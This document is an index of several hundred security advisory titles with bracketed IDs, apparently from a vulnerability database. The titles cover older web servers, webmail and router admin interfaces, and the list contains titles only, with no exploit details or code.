Origo ADSL Router Remote Administrative Interface Configuration Vulnerability [8854] Emule Web Control Panel HTTP Login Long Password Denial of Service Vulnerability [8832] Microsoft Exchange Server 5.5 Outlook Web Access Cross-Site Scripting Vulnerability [8810] Rit Research Labs TinyWeb Server Remote Denial of Service Vulnerability [8782] MiniHTTPServer WebForums Forum HTML Injection Vulnerability [8777] File Sharing Software Easy File Sharing Web Server Information Disclosure Vulnerability [8750] FortiGate Firewall Web Filter Logs HTML Injection Vulnerability [8745] Mutant Penguin MPWeb PRO Directory Traversal Vulnerability [8726] WebFS Long Pathname Buffer Overrun Vulnerability [8724] Webfs HTTP Server Information Disclosure Vulnerability [8723] Megacomputing Personal-WebServer Professional Denial Of Service Vulnerability [8721] Megacomputing Personal-WebServer Professional Remote Directory Traversal Vulnerability [8712] Savant Web Server Page Redirect Denial Of Service Vulnerability [8690] BRS WebWeaver Long URL Request Logging Failure Weakness [8686] EnGarde WebTool Password Disclosure Vulnerability [8667] Multiple Plug And Play Web Server FTP Service Command Handler Buffer Overflow Vulnerabilities [8661] Microsoft BizTalk Server Documentation/WebDAV Weak Permissions Vulnerability [8645] Plug and Play Web Server Directory Traversal Vulnerability [8634] Yahoo! Webcam ActiveX Control Buffer Overrun Vulnerability [8633] MiniHTTPServer WebForum Server Unauthorized Administrative Access Vulnerability [8632] EFS Software Easy File Sharing Web Server Directory Traversal Vulnerability [8620] MiniHTTPServer WebForums Server Default Password Vulnerability [8619] MiniHTTPServer WebForums/File-Sharing for NET Servers Directory Traversal Vulnerability [8601] 4D WebSTAR FTP Remote Long Password Buffer Overrun Vulnerability [8583] FutureWave WebX Server Directory Traversal Vulnerability [8563] ICQ Webfront guestbook Cross-Site Scripting Vulnerability [8547] FoxWeb PATH_INFO Remote Buffer Overrun Vulnerability [8545] EZ-WEB Site Builder Advanced Editor Selectedpage Parameter Directory Traversal Vulnerability [8540] WebCalendar Multiple Module SQL Injection Vulnerabilities [8539] WebCalendar Multiple Cross-Site Scripting Vulnerabilities [8524] Check Point Firewall-1 SecuRemote Internal Interface Address Information Leakage Vulnerability [8508] BEA WebLogic Integration Undisclosed File System Access Vulnerability [8504] AldWeb MiniPortail LNG Parameter Cross-Site Scripting Vulnerability [8459] Microsoft RPCSS DCOM Interface Long Filename Heap Corruption Vulnerability [8451] OMail Webmail Remote Command Execution Vulnerability [8438] DWebPro Http.ini Plaintext Password Storage Vulnerability [8437] Attila PHP Content Management System Multiple Web Vulnerabilities [8424] Skunkweb Cache Module File Disclosure Vulnerability [8423] Sun One/IPlanet Web Server Windows Denial Of Service Vulnerability [8422] Skunkweb Error Page Cross-Site Scripting Vulnerability [8393] PHP Website Multiple Module Cross-Site Scripting Vulnerability [8390] PHP Website Calendar Module SQL Injection Vulnerabilities [8383] Web ChatServer HTML Injection Vulnerability [8374] PostNuke Downloads / Web_Links Modules TTitle Cross-site Scripting Vulnerability [8363] MiniHTTPServer WebForums Server Null Default Password Vulnerability [8357] Bea WebLogic/Liquid Data Multiple Cross-Site Scripting Vulnerabilities [8349] Webware WebKit Cookie String Command Execution Vulnerability [8325] Novell GroupWise Wireless Webaccess Insecure Logged Password Vulnerability [8320] BEA WebLogic Server and WebLogic Express User Impersonation Vulnerability [8279] e107 Website System HTML Injection Vulnerability [8273] e107 Website System DB.PHP Information Disclosure Vulnerability [8251] Novell Netware Enterprise Web Server CGI2Perl.NLM Buffer Overflow Vulnerability [8249] MoreGroupWare WEBMAIL2_INC_DIR Remote File Include Vulnerability [8248] 3Com DSL Router Administrative Interface Long Request Router Denial Of Service Vulnerability [8244] Microsoft Multiple IIS 6.0 Web Admin Vulnerabilities [8243] Multiple Savant Web Server Denial Of Service Vulnerabilities [8242] Savant Web Server CGITest.HTML Cross Site Scripting Vulnerability [8237] WebCalendar Local File Include Information Disclosure Vulnerability [8234] Microsoft Windows RPCSS DCOM Interface Denial of Service Vulnerability [8205] Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability [8181] Twilight WebServer GET Request Buffer Overflow Vulnerability [8143] Multiple BEA WebLogic Server/Express Vulnerabilities [8138] Apache Web Server Type-Map Recursive Loop Denial Of Service Vulnerability [8137] Apache Web Server Prefork MPM Denial Of Service Vulnerability [8136] Macromedia Apache Web Server Encoded Space Source Disclosure Vulnerability [8135] Apache Web Server FTP Proxy IPV6 Denial Of Service Vulnerability [8134] Apache Web Server SSLCipherSuite Weak CipherSuite Renegotiation Weakness [8122] Mini-Webserver Information Disclosure Vulnerability [8119] CPanel Admin Interface HTML Injection Vulnerability [8113] Microsoft Outlook Web Access HTML Attachment Script Execution Vulnerability [8092] Microsoft IIS _VTI_BOT Malicious WebBot Elevated Permissions Vulnerability [8075] VisNetic Website Path Disclosure Vulnerability [8064] Abyss Web Server HTTP Header Injection Vulnerability [8062] Abyss Web Server HTTP GET Heap Overrun Vulnerability [8052] WebBBS Guestbook HTML Injection Vulnerability [8037] BRS WebWeaver Error Page Cross-Site Scripting Vulnerability [8024] Alt-N WebAdmin USER Parameter Buffer Overflow Vulnerability [8019] Compaq Web-Based Management Agent Remote File Verification Vulnerability [8018] VisNetic WebMail Information Disclosure Vulnerability [8017] Armida Databased Web Server Remote GET Request Denial Of Service Vulnerability [8015] Compaq Web-Based Management Agent Access Violation Denial of Service Vulnerability [8014] Compaq Web-Based Management Agent Remote Stack Overflow Denial of Service Vulnerability [8009] Compaq Web-Based Management Agent Multiple Remote Vulnerabilities [8007] QNX Demo Web Server Directory Traversal Vulnerability [7996] WebJeff Filemanager Plain Text Password Storage Vulnerability [7995] WebJeff Filemanager File Disclosure Vulnerability [7990] WebFS Request-URI Buffer Overflow Vulnerability [7978] SurfControl Web Filter File Disclosure Vulnerability [7968] Kerio MailServer Web Mail DO_MAP Module Cross-Site Scripting Vulnerability [7966] Kerio MailServer Web Mail ADD_ACL Module Cross-Site Scripting Vulnerability [7955] MiniHTTPServer WebForums Server Remote Directory Traversal Vulnerability [7947] LocalWEB2000 Information Disclosure Weakness [7940] Armida Databased Web Server Long Request Denial Of Service Vulnerability [7937] Noweb/Noroff Insecure Temporary File Creation Vulnerability [7928] Mailtraq Webmail Remote HTML Injection Vulnerability [7908] Methodus 3 Web Server File Disclosure Vulnerability [7890] WebBBS Pro Malicious GET Request Denial Of Service Vulnerability [7888] silentThought Simple Web Server Directory Traversal Vulnerability [7884] WebcamNow Plain Text Password Storage Weakness [7867] Aiglon Web Server Installation Path Information Disclosure Weakness [7864] Nuca WebServer File Disclosure Vulnerability [7837] Multiple MaxWebPortal Vulnerabilities [7833] Synkron.Web HTML Injection Vulnerability [7822] Forum Web Server Clear Authentication Credentials Storage Weakness [7815] Mailtraq Webmail Utility Path Disclosure Vulnerability [7787] Pi3Web SortName Buffer Overflow Vulnerability [7779] WebChat Users.PHP Cross-Site Scripting Vulnerability [7777] WebChat Users.PHP Database Username Disclosure Weakness [7775] Webfroot Shoutbox Expanded.PHP Remote Directory Traversal Vulnerability [7774] Webchat Module Path Disclosure Weakness [7772] Webfroot Shoutbox Expanded.PHP Remote Command Execution Vulnerability [7766] WebCortex WebStores2000 SQL Injection Vulnerability [7754] Pablo Software Solutions Baby Web Server Directory Traversal Vulnerability [7752] Pablo Software Solutions Baby Web Server Multiple Connection Denial Of Service Vulnerability [7746] Webfroot Shoutbox Remote Command Execution Vulnerability [7737] Webfroot Shoutbox URI Parameter File Disclosure Vulnerability [7735] Microsoft IIS WebDAV PROPFIND and SEARCH Method Denial of Service Vulnerability [7695] BRS WebWeaver POST and HEAD Denial Of Service Vulnerability [7619] Snowblind Web Server HTTP GET Request Buffer Overflow Vulnerability [7618] Snowblind Web Server File Disclosure Vulnerability [7617] Snowblind Web Server Malformed HTTP Request Denial Of Service Vulnerability [7591] BEA WebLogic JDBCConnectionPoolRuntimeMBean On-Screen Password Disclosure Vulnerability [7589] PHP-Nuke Web_Links Module Path Disclosure Vulnerability [7587] BEA Systems WebLogic Encryption Information Disclosure Weakness [7586] BEA Systems WebLogic CredentialMapper Plaintext Password Vulnerability [7563] BEA Systems WebLogic Multiple Password Storage Vulnerabilities [7558] PHPNuke Web_Links Module Remote SQL Injection Vulnerability [7555] Pi3Web Malformed GET Request Denial Of Service Vulnerability [7544] Boa Webserver File Disclosure Vulnerability [7528] BVRP SLWebmail Multiple Path Disclosure Bugs Vulnerablity [7527] BVRP SLWebmail GUI Applications Denial Of Service Vulnerability [7526] BVRP SLMail Administrative Interface Information Disclosure Vulnerability [7525] BVRP SLMail Administrative Interface Directory Traversal Vulnerability [7524] BVRP SLWebMail LANGUAGE Variable Buffer Overflow Vulnerability [7514] BVRP Software SLWebmail Multiple Buffer Overflow Vulnerabilities [7513] BVRP Software SLWebmail ShowGodLog.DLL File Disclosure Vulnerability [7511] BVRP Software SLWebmail Path Disclosure Vulnerability [7501] CommuniGate Pro Webmail Session Hijacking Vulnerability [7490] WebcamXP Message Field HTML Code Injection Vulnerability [7479] MDG Web Server 4D HTTP Command Buffer Overflow Vulnerability [7470] Microsoft BizTalk Server DTA Interface SQL Injection Vulnerability [7439] Alt-N WebAdmin Remote File Disclosure Vulnerability [7438] Alt-N WebAdmin Remote File Viewing Vulnerability [7425] BRS WebWeaver RETR Command Denial Of Service Vulnerability [7413] Cisco Secure ACS Management Interface Login Field Buffer Overflow Vulnerability [7410] Xeneo Web Server Undisclosed Buffer Overflow Vulnerability [7409] Web Protector Trivial Encryption Weakness [7398] Xeneo Web Server Denial Of Service Vulnerability [7392] 360 Degree Web PlatinumKey Access Control Bypass Application Execution Vulnerability [7391] 360 Degree Web PlatinumKey Access Control Bypass Information Disclosure Vulnerability [7390] MPCSoftWeb Database Disclosure Vulnerability [7389] MPCSoftWeb Guest Book HTML Injection Vulnerability [7380] Web Wiz Forum Information Disclosure Vulnerability [7371] NetGear Router Administrative Interface Content Filter Log Script Injection Vulnerability [7368] TW-WebServer Denial Of Service Vulnerability [7366] Novell GroupWise WebAccess Information Disclosure Vulnerability [7362] Ashley Brown iWeb Server Directory Traversal Vulnerability [7341] Web Wiz Site News Information Disclosure Vulnerability [7332] Apache Web Server OS2 Filestat Denial Of Service Vulnerability [7331] WebGUI HTTPProxy Denial Of Service Vulnerability [7287] Abyss Web Server Incomplete HTTP Request Denial Of Service Vulnerability [7285] BRS WebWeaver User Password Encryption Weakness [7283] BRS WebWeaver Information Disclosure Vulnerability [7280] BRS WebWeaver Long Request Remote Denial of Service Vulnerability [7277] WebC.CGI Environment Variable Buffer Overflow Vulnerability [7274] WebC Local Configuration File Format String Vulnerability [7272] AutomatedShops WebC Symbolic Link Following Configuration File Weakness [7268] AutomatedShops WebC Script Name Remote Buffer Overrun Vulnerability [7257] BEA WebLogic Hostname/NetBIOS Name Remote Information Disclosure Vulnerability [7255] Apache Web Server File Descriptor Leakage Vulnerability [7254] Apache Web Server Linefeed Memory Allocation Denial Of Service Vulnerability [7232] Beanwebb Guestbook Unauthorized Administrative Access Vulnerability [7231] Beanwebb Guestbook HTML Injection Vulnerability [7227] Multiple Vendor Web Browser LiveConnect JavaScript Denial Of Service Vulnerability [7190] Web Chat Manager HTML Code Injection Vulnerability [7131] BEA Systems WebLogic JNDI Tree Modify Access Vulnerability [7130] BEA WebLogic Web Application Authentication Bypass Vulnerability [7127] MyAbraCadaWeb Search Engine Cross-Site Scripting Vulnerability [7126] MyAbraCadaWeb Path Disclosure Vulnerability [7124] BEA WebLogic Remote Unprivileged Administration Access Vulnerability [7122] BEA WebLogic Internal Servlet Input Validation Vulnerabilities [7115] Outblaze Webmail Cookie Authentication Bypass Vulnerability [7055] GreyMatter WebLog Remote Command Execution Vulnerability [7038] Lotus Notes/Domino Web Retriever Buffer Overflow Denial Of Service Vulnerability [7022] Dr.Web Virus Scanner Folder Name Buffer Overflow Vulnerability [7016] WebLog Expert Logfile HTML Injection Vulnerability [7015] WebLog Expert HTTP Header Code Injection Vulnerability [7013] WebTrends Analysis Suite Logfile HTML Injection Vulnerability [7000] Webchat Defines.PHP Remote File Include Vulnerability [6996] Web-ERP Configuration File Remote Access Vulnerability [6988] Typo3 Webroot Folders Information Disclosure Weakness [6951] IBM Lotus Domino Web Server HTTP POST Denial Of Service Vulnerability [6943] Apache Web Server MIME Boundary Information Disclosure Vulnerability [6939] Apache Web Server ETag Header Information Disclosure Weakness [6933] phpWebFileManager File Disclosure Vulnerability [6915] Webmin/Usermin Session ID Spoofing Unauthenticated Access Vulnerability [6896] Novell GroupWise WebAccess Unspecified Malicious Script Vulnerability [6885] cPanel Openwebmail Local Privileges Escalation Vulnerability [6871] IBM Lotus Domino Web Server iNotes s_ViewName/Foldername Buffer Overflow Vulnerability [6826] iPlanet Web Server Response Header Buffer Overflow Vulnerability [6758] IBM WebSphere Exported XML Password Encoding Weakness [6736] HP Compaq Insight Manager/Compaq Web Agent Session Persistence Vulnerability [6729] Deerfield Website Pro Remote Denial of Service Vulnerability [6722] Apache Tomcat Web.XML File Contents Disclosure Vulnerability [6720] Apache Tomcat Example Web Application Cross Site Scripting Vulnerability [6719] BEA WebLogic Keystore Clear Text Password Storage Vulnerability [6717] BEA Systems WebLogic Server and Express Session Sharing Vulnerability [6682] Sun JSSE/Java Plug-In/Java Web Start Incorrect Certificate Validation Vulnerability [6662] Apache Web Server MS-DOS Device Name Denial Of Service Vulnerability [6661] Apache Web Server Default Script Mapping Bypass Vulnerability [6660] Apache Web Server Illegal Character HTTP Request File Disclosure Vulnerability [6659] Apache Web Server MS-DOS Device Name Arbitrary Code Execution Vulnerability [6635] fnord Web Server Buffer Overflow Vulnerability [6599] Xitami Webserver Administrative Port Buffer Overflow Vulnerability [6586] Bea Systems WebLogic ResourceAllocationException System Password Disclosure Vulnerability [6585] BRS WebWeaver MKDir Directory Traversal Weakness [6581] Simple Web Counter URI Parameter Buffer Overflow Vulnerability [6576] BRS WebWeaver MKDir FTP Root Path Disclosure Vulnerability [6574] Follett Software WebCollection Plus File Reading Vulnerability [6569] Business Objects WebIntelligence Application Session Hijacking Vulnerability [6549] GeneWeb File Disclosure Vulnerability [6542] CommuniGate Pro Webmail File Disclosure Vulnerability [6540] H-Sphere Webshell diskusage.cc Buffer Overflow Vulnerability [6539] H-Sphere Webshell Command2.CC Zipfile URI Parameter Command Execution Vulnerability [6538] H-Sphere Webshell flist() Buffer Overflow Vulnerability [6537] H-Sphere Webshell Command.C Mode URI Parameter Command Execution Vulnerability [6527] H-Sphere Webshell Remote Buffer Overrun Vulnerability [6514] ELog Web Logbook Multiple Buffer Overflow Vulnerabilities [6500] N/X Web Content Management System Remote File Include Vulnerability [6491] Web-cyradm Remote Denial of Service Vulnerability [6433] CUPS HTTP Interface Integer Overflow Vulnerability [6425] Open WebMail Arbitrary Script Execution Vulnerability [6411] Captaris Infinite WebMail HTML Injection Vulnerability [6400] PHP-Nuke Web Mail Script Injection Vulnerability [6399] PHP-Nuke Web Mail Remote PHP Script Execution Vulnerability [6385] Webshots Desktop Screen Saver Password Bypassing Vulnerability [6378] Bea Systems WebLogic Xerces XML Parser Denial Of Service Vulnerability [6369] Deerfield VisNetic WebSite Cross Site Scripting Vulnerability [6364] Deerfield VisNetic Website OPTIONS Memory Corruption Vulnerability [6327] Sapio WebReflex Directory Traversal Vulnerability [6326] Cobalt RaQ4 Administrative Interface Command Execution Vulnerability [6292] Webster HTTP Server Cross Site Scripting Vulnerability [6291] Webster HTTP Server File Disclosure Vulnerability [6289] Webster HTTP Server Long Request Buffer Overrun Vulnerability [6288] McAfee VirusScan WebScanX Code Execution Vulnerability [6271] pWins Web Server Directory Traversal Vulnerability [6251] Web Server Creator Web Portal Remote File Include Vulnerability [6232] Open WebMail User Name Information Disclosure Vulnerability [6189] Courier SqWebMail File Disclosure Vulnerability [6180] KeyFocus KF Web Server Directory Traversal Vulnerability [6165] Xoops WebChat Module Remote SQL Injection Vulnerability [6147] Sun Solaris Network Interface Denial Of Service Vulnerability [6145] Simple Web Server File Disclosure Vulnerability [6126] Macromedia JRun Web Server Unicode Source Disclosure Vulnerability [6098] Northern Solutions Xeneo Web Server Denial Of Service Vulnerability [6070] Microsoft IIS WebDAV Denial Of Service Vulnerability [6065] Apache 2 WebDAV CGI POST Request Information Disclosure Vulnerability [6061] Sun Solaris Web-Based Enterprise Management Insecure Default File Permissions Vulnerability [6042] LiteServe Web Server File Disclosure Vulnerability [6041] BRS WebWeaver Web Server File Access Vulnerability [6034] Radiobird Software WebServer 4 All Host Field Header Buffer Overflow Vulnerability [6014] NOCC Webmail View Headers HTML Injection Vulnerability [6006] Software602 Web602 Web Server Unauthorized Admin Directory Access Vulnerability [6002] IBM Websphere Caching Proxy Denial Of Service Vulnerability [6001] IBM Websphere Edge Server HTTP Header Injection Vulnerability [6000] IBM Websphere Edge Server Cross Site Scripting Vulnerability [5996] Apache AB.C Web Benchmarking Buffer Overflow Vulnerability [5995] Apache AB.C Web Benchmarking Read_Connection() Buffer Overflow Vulnerability [5988] PlanetDNS PlanetWeb Malformed Request Remote Buffer Overflow Vulnerability [5980] Microsoft SQL Server Web Task Stored Procedure Privilege Escalation Vulnerability [5971] BEA WebLogic Server/Express/Integration Application Migration Security Policy Weakness [5968] RadioBird Software WebServer 4 All Directory Traversal Vulnerability [5967] RadioBird Software WebServer 4 All Buffer Overflow Vulnerability [5961] TelCondex SimpleWebServer Denial Of Service Vulnerability [5954] My Web Server Long Get Request Denial Of Service Vulnerability [5949] SquirrelMail Options.PHP Web Root Path Disclosure Vulnerability [5936] Webmin Static SSL Key Vulnerability [5902] Oracle 9i Application Server Web Cache Administration Tool Denial Of Service Vulnerability [5884] Apache Web Server Scoreboard Memory Segment Overwriting SIGUSR1 Sending Vulnerability [5864] PHPWebSite Article.PHP Cross-Site Scripting Vulnerability [5859] SurfControl SuperScout WebFilter SQL Injection Vulnerability [5857] SurfControl SuperScout WebFilter File Disclosure Vulnerability [5856] SurfControl SuperScout WebFilter User Accounts Information Disclosure Vulnerability [5854] SurfControl SuperScout WebFilter Malformed GET Request DoS Vulnerability [5846] BEA WebLogic Server and Express Inadvertent Security Removal Weakness [5823] EmuMail Web Root Path Disclosure Vulnerability [5819] BEA WebLogic Server and Express HTTP Response Information Disclosure Vulnerability [5815] WatchGuard Firebox VClass CLI Interface Improperly Terminated Connection Vulnerability [5814] WatchGuard Firebox VClass CLI Interface Format String Vulnerability [5813] Zope Through The Web Code Remote Denial Of Service Vulnerability [5803] MDG Web Server 4D Insecure Credential Storage Vulnerability [5802] PHPWebSite News Message HTML Injection Vulnerability [5794] NullLogic Null Webmail Format String Vulnerability [5793] ACWeb Cross-Site Scripting Vulnerability [5782] Dino's Webserver File Disclosure Vulnerability [5779] phpWebsite PHP File Include Vulnerability [5773] HP WEBES Service Tools Compaq Analyze Unauthorized File Access Vulnerability [5749] IBM WebSphere Large HTTP Header Buffer Overflow Vulnerability [5725] DB4Web Connection Proxy Vulnerability [5723] DB4Web File Disclosure Vulnerability [5710] PlanetWeb Long GET Request Buffer Overflow Vulnerability [5709] Savant Webserver File Disclosure Vulnerability [5707] Savant Webserver Malformed Content-Length Denial Of Service Vulnerability [5706] Savant Webserver cgitest.exe Denial Of Service Vulnerability [5699] ht://Check Web Header Script Injection Vulnerability [5686] Savant Webserver Buffer Overflow Vulnerability [5674] Wordtrans-web Script Injection Vulnerability [5671] Wordtrans-web Remote Command Execution Vulnerability [5664] SWS Simple Web Server New Line Denial Of Service Vulnerability [5662] SWS Simple Web Server File Disclosure Vulnerability [5660] SWS Simple Web Server Stack Corruption Vulnerability [5659] SWS Simple Web Server Non-existent File Request Denial Of Service Vulnerability [5615] Cisco HTTP Interface Long Request Denial Of Service Vulnerability [5600] FactoSystem Weblog Multiple SQL Injection Vulnerabilities [5597] Alan Ward A-Cart Web Accessable Database File Vulnerability [5591] Webmin RPC Function Privilege Escalation Vulnerability [5549] Abyss Web Server Malicious HTTP Request Information Disclosure Vulnerability [5548] Abyss Web Server Administrative Console Unauthorized Access Vulnerability [5547] Abyss Web Server Encoded Backslash Directory Traversal Vulnerability [5519] WebEasyMail POP3 Server Valid User Name Information Disclosure Vulnerability [5518] WebEasyMail SMTP Service Format String Vulnerability [5507] Kerio MailServer Web Mail Multiple Cross Site Scripting Vulnerabilities [5474] Webscriptworld Web Shop Manager Remote Arbitrary Command Execution Vulnerability [5471] MyWebServer Invalid Path Web Root Disclosure Vulnerability [5470] MyWebServer Long HTTP Request HTML Injection Vulnerability [5469] MyWebServer Search Request Remote Buffer Overflow Vulnerability [5464] GoAhead WebServer Remote Arbitrary Command Execution Vulnerability [5456] CafeLog b2 WebLog Tool SQL Injection Vulnerability [5455] CafeLog b2 WebLog Tool Cross Site Scripting Vulnerability [5435] BlueFace Falcon Web Server Error Message Cross-Site Scripting Vulnerability [5433] Sun ONE/iPlanet Web Server Chunked Encoding Vulnerability [5418] Ensim Webppliance Unauthorized Email Access Vulnerability [5384] Inso DynaWeb httpd Format String Vulnerability [5368] HP JetDirect Embedded Web Server Password Handling Vulnerability [5365] IPSwitch IMail Web Calendaring Incomplete Post Denial Of Service Vulnerability [5345] Abyss Web Server HTTP GET Request Directory Contents Disclosure Vulnerability [5323] IPSwitch IMail Web Messaging HTTP Get Buffer Overflow Vulnerability [5290] Multiple Vendor Web Browser JavaScript Modifier Keypress Event Subversion Vulnerability [5276] Working Resources BadBlue Administrative Interface Arbitrary File Access Vulnerability [5263] Sun Java Web Start JNLP Predictable File Location Vulnerability [5238] IMHO Webmail Account Hijacking Vulnerability [5231] Novell NetMail WebAdmin Buffer Overflow Vulnerability [5230] Novell NetMail ModWeb Buffer Overflow Vulnerability [5220] Pingtel Expressa Web Server Cross-Site Scripting Vulnerability [5198] GoAhead WebServer Error Page Cross Site Scripting Vulnerability [5197] GoAhead WebServer URL Encoded Slash Directory Traversal Vulnerability [5191] iPlanet Web Server Search Component File Disclosure Vulnerability [5184] MyWebServer GET Request Buffer Overflow Vulnerability [5177] Key Focus KF Web Server Directory Contents Disclosure Vulnerability [5175] Webresolve Host Name Buffer Overflow Vulnerability [5159] BEA Systems WebLogic Server and Express Race Condition Denial of Service Vulnerability [5139] AnalogX Proxy Web Proxy Buffer Overflow Vulnerability [5127] Simple WAIS Interface Arbitrary Command Execution Vulnerability [5119] Multiple Vendor WEB-INF Directory Contents Disclosure Vulnerability [5089] BEA Systems WebLogic Access Controls Bypass Vulnerability [5080] GameCheats Advanced Web Server Malformed HTTP Request Denial Of Service Vulnerability [5065] BasiliX Webmail Mail Attachment Disclosure Vulnerability [5062] BasiliX Webmail Arbitrary File Disclosure Vulnerability [5061] BasiliX Webmail SQL Injection Vulnerability [5060] BasiliX Webmail Message Content Script Injection Vulnerability [5054] Apache Tomcat Web Root Path Disclosure Vulnerability [5048] WebScripts WebBBS Remote Command Execution Vulnerability [5045] 4D WebServer Long HTTP Request Buffer Overflow Vulnerability [5036] NetGear RP114 Administrative Access Via External Interface Vulnerability [5035] Wolfram Research webMathematica File Disclosure Vulnerability [5006] AnalogX SimpleServer:WWW Web Server Buffer Overflow Vulnerability [4982] Belkin F5D5230-4 Router Internal Web Traffic Origin Obfuscation Vulnerability [4976] BizDesign ImageFolio Authorized User Web Root Disclosure Vulnerability [4962] WebCalendar Edit_User_Handler.PHP Unauthorized Access Vulnerability [4961] WebCalendar Include Files Information Disclosure Vulnerability [4954] Microsoft Internet Explorer FTP Web View Cross Site Scripting Vulnerability [4897] Evolvable Shambala Server Web Server Denial Of Service Vulnerability [4877] Apache Tomcat Example Files Web Root Path Disclosure Vulnerability [4874] Netscape Enterprise Web Server for Netware Information Disclosure Vulnerability [4860] Tomahawk Technologies SteelArrow Web Application Server Multiple Buffer Overflow Vulnerabilities [4856] Oracle Web Cache Remotely Exploitable Buffer Overflow Vulnerabilities [4851] iPlanet Web Server Search Component Buffer Overflow Vulnerability [4833] BlueFace Falcon Web Server File Disclosure Vulnerability [4820] LocalWEB2000 File Disclosure Vulnerability [4783] Deerfield WebSite Pro 8.3 Filename Source Disclosure Vulnerability [4756] Clicky Web Pseudo-frames Remote File Include Vulnerability [4740] NOCC Webmail Script Injection Vulnerability [4734] BEA WebLogic Server and Express File Disclosure Vulnerability [4733] BEA Systems WebLogic Server and Express Password Disclosure Vulnerability [4728] Seminole Webserver Invalid Request Heap Corruption Vulnerability [4727] Seminole Webserver Empty Request Denial of Service Vulnerability [4712] Cisco ATA-186 Web Administration Authentication Bypass Vulnerability [4700] Webmin / Usermin Authentication Bypass Vulnerability [4694] Webmin / Usermin Login Cross Site Scripting Vulnerability [4691] Lysias Lidik Webserver Directory Traversal Vulnerability [4670] askSam Web Publisher Cross Site Scripting Vulnerability [4665] 4D WebServer Authentication Buffer Overflow [4646] BEA Systems WebLogic Server and Express Null Character DOS Device Denial of Service Vulnerability [4645] BEA Systems WebLogic Server and Express URL Parsing Source Code Disclosure Vulnerability [4643] BEA Systems WebLogic Server and Express URL Parsing Path Disclosure Vulnerability [4622] PhpWebGallery Cookie Manipulation Account Compromise Vulnerability [4531] WebTrends Reporting Center GET Request Buffer Overflow Vulnerability [4530] TalentSoft Web+ WML Request Cookie Buffer Overflow Vulnerability [4528] Microsoft BackOffice Server Web Administration Authentication Bypass Vulnerability [4504] Bradford Barrett Webalizer Reverse DNS Buffer Overflow Vulnerability [4503] StepWeb Search Engine Admin Webpage Access Vulnerability [4498] IBM Informix Web Datablade SQL Query HTML Decoding Vulnerability [4496] IBM Informix Web Datablade Page Request SQL Injection Vulnerability [4467] Abyss Web Server Plaintext Administrative Password Vulnerability [4466] Abyss Web Server File Disclosure Vulnerability [4457] Microsoft Office Web Components Clipboard Information Disclosure Vulnerability [4454] Microsoft Office Web Components Chart Local File Existence Disclosure Vulnerability [4453] Microsoft Office Web Components Local File Read Vulnerability [4449] Microsoft Office Web Components Active Script Execution Vulnerability [4425] Quik-Serv Web Server Arbitrary File Disclosure Vulnerability [4390] Microsoft Outlook Web Access with RSA SecurID Authentication Bypass Vulnerability [4382] Citrix Nfuse boilerplate.asp Web Root Disclosure Vulnerability [4361] Instant Web Mail POP Command Execution Vulnerability [4357] WebSight Directory System Cross Site Scripting Vulnerability [4354] tagtraum industries Jo! Webserver Cross Site Scripting Vulnerability [4351] Webmin Plaintext Authentication Credentials Disclosure Vulnerability [4343] Qualcomm Eudora WebBrowser Control Embedded Media Player File Vulnerability [4342] HP Praesidium Webproxy Unauthorized Access Vulnerability [4333] PHP Nuke Error Message Web Root Disclosure Vulnerability [4329] Webmin Script Code Input Validation Vulnerability [4328] Webmin Insecure Directory Permissions Vulnerability [4312] Big Sam Web Root Disclosure Vulnerability [4310] Multiple Vendor Java Web Start Unsigned Application Vulnerability [4305] Board-TNK Web Information Cross-Agent Scripting Vulnerability [4292] Oracle 9iAS Apache PL/SQL Module Web Administration Access Vulnerability [4282] TalentSoft Web+ Web Markup Language Buffer Overflow Vulnerability [4261] John Roy Pi3Web Path Disclosure Vulnerability [4233] TalentSoft Web+ Webpsvc Buffer Overflow Vulnerability [4206] Novell GroupWise Web Root Disclosure Vulnerability [4186] Galacticomm Worldgroup Remote Web Server Denial of Service Vulnerability [4160] Essentia Web Server Directory Traversal Vulnerability [4159] Essentia Web Server Long URL Buffer Overflow Vulnerability [4156] NetWin WebNEWS Default Account Vulnerability [4145] Nombas ScriptEase:WebServer Edition GET Request Denial of Service Vulnerability [4128] Nombas ScriptEase:WebServer Edition Denial of Service Vulnerability [4124] NetWin WebNEWS Remote Buffer Overflow Vulnerability [4123] Dino's Webserver Denial of Service Vulnerability [4119] Phusion Webserver Long URL Buffer Overflow Vulnerability [4118] Phusion Webserver Long URL Denial Of Service Vulnerability [4117] Phusion Webserver Directory Traversal Vulnerability [4110] Blue World Lasso Web Data Engine Vulnerability [4099] BlueFace Falcon Web Server Authentication Bypass Vulnerability [4020] Lotus Domino Webserver DOS Device Extension Denial of Service Vulnerability [4013] PHPWebThings Utility Script Direct Access Vulnerability [3962] Ganglia PHP RRD Web Client Remote Command Execution Vulnerability [3939] W3Perl Web Statistics Header Manipulation Vulnerability [3936] Caldera UnixWare WebTop SCOAdminReg.CGI Arbitrary Command Execution Vulnerability [3930] Cyberstop Web Server Long Request DoS Vulnerability [3929] Cyberstop Web Server MS-DOS Device Denial of Service Vulnerability [3922] COWS CGI Online Worldweb Shopping Insecure File Permissions Vulnerability [3921] COWS CGI Online Worldweb Shopping Compatible.CGI Cross-Site Scripting Vulnerability [3915] COWS CGI Online Worldweb Shopping Information Disclosure Vulnerability [3914] COWS CGI Online Worldweb Shopping Diagnose.CGI Cross-Site Scripting Vulnerability [3908] Joe Testa hellbent Relative Web Root Path Information Disclosure Vulnerability [3876] NetGear RP114 Cable/DSL Web Safe Router WAN Port DoS Vulnerability [3874] MDG Computer Services Web Server 4D/eCommerce DoS Vulnerability [3866] John Roy Pi3Web For Windows Long Request Buffer Overflow Vulnerability [3861] Dino's Webserver Directory Traversal Vulnerability [3841] Cacheflow CacheOS Web Administration Arbitrary Cached Page Code Leakage Vulnerability [3831] Netscape Enterprise Web Server Brute Force Authentication Attacks Vulnerability [3826] Netscape Enterprise Server Web Publisher DoS Vulnerability [3816] BEA Systems WebLogic Server DOS Device Denial of Service Vulnerability [3814] Anti-Web HTTPD Script Engine Heap Overflow Vulnerability [3788] Michael Lamont Savant Web Server Long Request DoS Vulnerability [3782] Anti-Web HTTPD Script Engine File Opening Denial Of Service Vulnerability [3765] Oracle Oracle9iAS Web Cache HTTP Header DoS Vulnerability [3764] Oracle Oracle9iAS Web Cache World Readable Password File Vulnerability [3762] Oracle9iAS Web Cache Multiple Periods Denial Of Service Vulnerability [3761] Oracle9iAS Web Cache Privilege Escalation Vulnerability [3760] Oracle9iAS Web Cache Null Character Denial Of Service Vulnerability [3746] ELSA Lancom 1100 Office Insecure Web Administration 